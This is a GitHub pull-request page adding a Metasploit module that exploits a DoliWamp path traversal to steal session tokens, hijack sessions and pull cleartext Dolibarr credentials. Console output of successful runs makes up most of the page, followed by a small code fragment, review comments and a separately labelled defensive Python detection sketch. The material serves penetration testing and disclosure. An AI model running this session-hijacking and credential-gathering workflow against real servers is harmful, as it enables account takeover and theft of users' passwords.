Add DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials module #2940

Merged
merged 1 commit into from
Feb 10, 2014

@bcoles bcoles commented Feb 3, 2014

Add DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials module.

Steals session tokens, attempts to hijack each session and gathers the user's username and password in clear text.

Example Output

msf> use auxiliary/gather/doliwamp_traversal_creds 
msf auxiliary(doliwamp_traversal_creds) > set RHOST 192.168.237.138
RHOST => 192.168.237.138
msf auxiliary(doliwamp_traversal_creds) > set VERBOSE true
VERBOSE => true
msf auxiliary(doliwamp_traversal_creds) > run

[*] 192.168.237.138:80 - Finding session tokens...
[+] 192.168.237.138:80 - Found 64 session tokens
[*] 192.168.237.138:80 - Trying to hijack a session...
[+] 192.168.237.138:80 - Found credentials (admin:admin)

Dolibarr User Credentials
=========================

 Username  Password  Admin  E-mail
 --------  --------  -----  ------
 admin     admin     Yes    

[*] Credentials saved in: /root/.msf4/loot/20140111063740_default_192.168.237.138_dolibarr.travers_981990.csv
[*] Auxiliary module execution completed

Example Verbose Output

msf> use auxiliary/gather/doliwamp_traversal_creds 
msf auxiliary(doliwamp_traversal_creds) > set RHOST 192.168.237.138
RHOST => 192.168.237.138
msf auxiliary(doliwamp_traversal_creds) > set VERBOSE true
VERBOSE => true
msf auxiliary(doliwamp_traversal_creds) > run

[*] 192.168.237.138:80 - Finding session tokens...
[+] 192.168.237.138:80 - Found 64 session tokens
[*] 192.168.237.138:80 - Trying to hijack a session...
[*] 192.168.237.138:80 - Trying to hijack a session -   1.56% done (1/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   3.12% done (2/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   4.69% done (3/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   6.25% done (4/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   7.81% done (5/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   9.38% done (6/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  10.94% done (7/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  12.50% done (8/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  14.06% done (9/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  15.62% done (10/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  17.19% done (11/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  18.75% done (12/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  20.31% done (13/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  21.88% done (14/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  23.44% done (15/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  25.00% done (16/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  26.56% done (17/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  28.12% done (18/64 tokens)
[+] 192.168.237.138:80 - Hijacked session for user with ID '1'
[*] 192.168.237.138:80 - Retrieving user's credentials
[+] 192.168.237.138:80 - Found credentials (admin:admin)
[*] 192.168.237.138:80 - Trying to hijack a session -  29.69% done (19/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  31.25% done (20/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  32.81% done (21/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  34.38% done (22/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  35.94% done (23/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  37.50% done (24/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  39.06% done (25/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  40.62% done (26/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  42.19% done (27/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  43.75% done (28/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  45.31% done (29/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  46.88% done (30/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  48.44% done (31/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  50.00% done (32/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  51.56% done (33/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  53.12% done (34/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  54.69% done (35/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  56.25% done (36/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  57.81% done (37/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  59.38% done (38/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  60.94% done (39/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  62.50% done (40/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  64.06% done (41/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  65.62% done (42/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  67.19% done (43/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  68.75% done (44/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  70.31% done (45/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  71.88% done (46/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  73.44% done (47/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  75.00% done (48/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  76.56% done (49/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  78.12% done (50/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  79.69% done (51/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  81.25% done (52/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  82.81% done (53/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  84.38% done (54/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  85.94% done (55/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  87.50% done (56/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  89.06% done (57/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  90.62% done (58/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  92.19% done (59/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  93.75% done (60/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  95.31% done (61/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  96.88% done (62/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  98.44% done (63/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 100.00% done (64/64 tokens)

Dolibarr User Credentials
=========================

 Username  Password  Admin  E-mail
 --------  --------  -----  ------
 admin     admin     Yes    

[*] Credentials saved in: /root/.msf4/loot/20140111063740_default_192.168.237.138_dolibarr.travers_981990.csv
[*] Auxiliary module execution completed
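
A detection-side sketch for the behaviour the description and output above show, where one client tries many session tokens in a row. It is an added example, not part of the pull request or of Metasploit: it flags a client IP that presents several distinct session IDs within a short window and lists the ones first seen from another address. The record format (timestamp, client IP, session ID), the thresholds and the sample data are assumptions constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records: "<timestamp> <client IP> <session ID>".
# Format and values are assumptions for this example, not real logs.
SAMPLE = """\
2014-01-11T06:30:00 10.0.0.5 sess-a
2014-01-11T06:31:00 10.0.0.6 sess-b
2014-01-11T06:32:10 10.0.0.7 sess-c
2014-01-11T06:37:40 10.0.0.99 sess-a
2014-01-11T06:37:41 10.0.0.99 sess-b
2014-01-11T06:37:41 10.0.0.99 sess-x
2014-01-11T06:37:42 10.0.0.99 sess-c
2014-01-11T06:40:00 10.0.0.5 sess-a
"""


def parse(text):
    """Yield (timestamp, ip, session_id) tuples, skipping malformed lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        ts, ip, sid = parts
        yield datetime.fromisoformat(ts), ip, sid


def find_token_sweeps(records, min_tokens=3, window=timedelta(seconds=60)):
    """Flag IPs that present >= min_tokens distinct session IDs within window.

    Returns {ip: {"distinct": [...], "foreign": [...]}}, where "foreign"
    holds the session IDs that were first seen from a different IP.
    """
    first_ip = {}                # session ID -> first IP seen using it
    recent = defaultdict(list)   # ip -> [(timestamp, session ID)] in window
    flagged = defaultdict(set)   # ip -> session IDs seen while over threshold
    for ts, ip, sid in sorted(records):
        first_ip.setdefault(sid, ip)
        events = recent[ip]
        events.append((ts, sid))
        while ts - events[0][0] > window:   # expire events outside the window
            events.pop(0)
        distinct = {s for _, s in events}
        if len(distinct) >= min_tokens:
            flagged[ip] |= distinct
    return {
        ip: {"distinct": sorted(sids),
             "foreign": sorted(s for s in sids if first_ip[s] != ip)}
        for ip, sids in flagged.items()
    }
```

A non-empty "foreign" list is the stronger signal: the same session ID moving between addresses is what a replayed token looks like from the server side.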

vprint_good("#{peer} - Hijacked session for user with ID '#{user_id}'")
return user_id
else
# print_debug("#{peer} - Could not hijack session. Session is invalid.")
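Review bot: the print_debug call in the visible else branch is merged as a commented-out line, so the failure path of this check reports nothing while the success path above it reports through vprint_good. Either restore it as a vprint_status call, so the "Could not hijack session" message follows the same VERBOSE gating as the success message, or delete the line rather than carrying dead code into master.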
Did you mean to leave this commented out? Looks like useful info for debugging purposes.

@wchen-r7 wchen-r7 self-assigned this Feb 10, 2014
@wchen-r7

Processing.

@wchen-r7 wchen-r7 merged commit 9b9b2fa into rapid7:master Feb 10, 2014
@wchen-r7

Verification:

msf auxiliary(doliwamp_traversal_creds) > run

[*] 10.*.***.***:8181 - Finding session tokens...
[+] 10.*.***.***:8181 - Found 8 session tokens
[*] 10.*.***.***:8181 - Trying to hijack a session...
[*] 10.*.***.***:8181 - Trying to hijack a session -  12.50% done (1/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  25.00% done (2/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  37.50% done (3/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  50.00% done (4/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  62.50% done (5/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  75.00% done (6/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  87.50% done (7/8 tokens)
[+] 10.*.***.***:8181 - Hijacked session for user with ID '1'
[*] 10.*.***.***:8181 - Retrieving user's credentials
[+] 10.*.***.***:8181 - Found credentials (admin:********)
[*] 10.*.***.***:8181 - Trying to hijack a session - 100.00% done (8/8 tokens)

Dolibarr User Credentials
=========================

 Username  Password  Admin  E-mail
 --------  --------  -----  ------
 admin     ********  Yes   

@bcoles bcoles deleted the doliwamp_traversal_creds branch April 6, 2014 13:40